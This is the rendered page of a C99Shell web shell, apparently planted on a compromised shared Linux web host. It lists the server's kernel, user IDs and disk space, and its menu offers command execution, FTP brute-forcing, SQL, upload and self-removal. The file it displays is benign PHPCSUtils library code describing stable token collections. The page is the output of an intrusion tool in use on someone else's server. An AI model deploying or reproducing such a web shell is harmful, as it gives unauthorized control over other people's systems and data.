!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/local/wp/vendor/phpcsstandards/phpcsutils/PHPCSUtils/Internal/   drwxr-xr-x
Free 713.64 GB of 879.6 GB (81.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     StableCollections.php (2.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * PHPCSUtils, utility functions and classes for PHP_CodeSniffer sniff developers.
 *
 * @package   PHPCSUtils
 * @copyright 2019-2020 PHPCSUtils Contributors
 * @license   https://opensource.org/licenses/LGPL-3.0 LGPL3
 * @link      https://github.com/PHPCSStandards/PHPCSUtils
 */

namespace PHPCSUtils\Internal;

/**
 * Stable collections of related tokens.
 *
 * The {@see \PHPCSUtils\Tokens\Collections} class contains a range of token collections for use by sniffs,
 * some of which may change depending on the availability of a token in PHP/PHPCS.
 * The contents of token collections may also vary based on the PHPCS version to allow for optimized sniffing.
 *
 * The functionality _within_ PHPCSUtils, however, should be stable and reliably testable, so for internal
 * use, the most volatile token arrays are replicated here in stable versions to be used by the PHPCSUtils
 * functions (and tests) internally.
 *
 * ---------------------------------------------------------------------------------------------
 * This class is only intended for internal use by PHPCSUtils and is not part of the public API.
 * This also means that it has no promise of backward compatibility.
 *
 * End-users should use the methods in the {@see \PHPCSUtils\Tokens\Collections} class instead.
 * ---------------------------------------------------------------------------------------------
 *
 * @internal
 *
 * @since 1.0.0
 */
final class StableCollections
{

    /**
     * Tokens which can open a short array or short list (PHPCS cross-version compatible).
     *
     * This array will ALWAYS include the `T_OPEN_SQUARE_BRACKET` token to allow for handling
     * intermittent tokenizer issues related to the retokenization to `T_OPEN_SHORT_ARRAY`.
     *
     * @internal
     * @ignore   This array is only for internal use by PHPCSUtils and is not part of the public API.
     *
     * @since 1.0.2
     *
     * @var array<int|string, int|string>
     */
    public static $shortArrayListOpenTokensBC = [
        \T_OPEN_SHORT_ARRAY    => \T_OPEN_SHORT_ARRAY,
        \T_OPEN_SQUARE_BRACKET => \T_OPEN_SQUARE_BRACKET,
    ];

    /**
     * Tokens which are used for short lists.
     *
     * This array will ALWAYS include the `T_OPEN_SQUARE_BRACKET` and `T_CLOSE_SQUARE_BRACKET` tokens
     * to allow for handling intermittent tokenizer issues related to the retokenization to `T_OPEN_SHORT_ARRAY`.
     *
     * @internal
     * @ignore   This array is only for internal use by PHPCSUtils and is not part of the public API.
     *
     * @since 1.0.2
     *
     * @var array<int|string, int|string>
     */
    public static $shortArrayListTokensBC = [
        \T_OPEN_SHORT_ARRAY     => \T_OPEN_SHORT_ARRAY,
        \T_CLOSE_SHORT_ARRAY    => \T_CLOSE_SHORT_ARRAY,
        \T_OPEN_SQUARE_BRACKET  => \T_OPEN_SQUARE_BRACKET,
        \T_CLOSE_SQUARE_BRACKET => \T_CLOSE_SQUARE_BRACKET,
    ];
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0175 ]--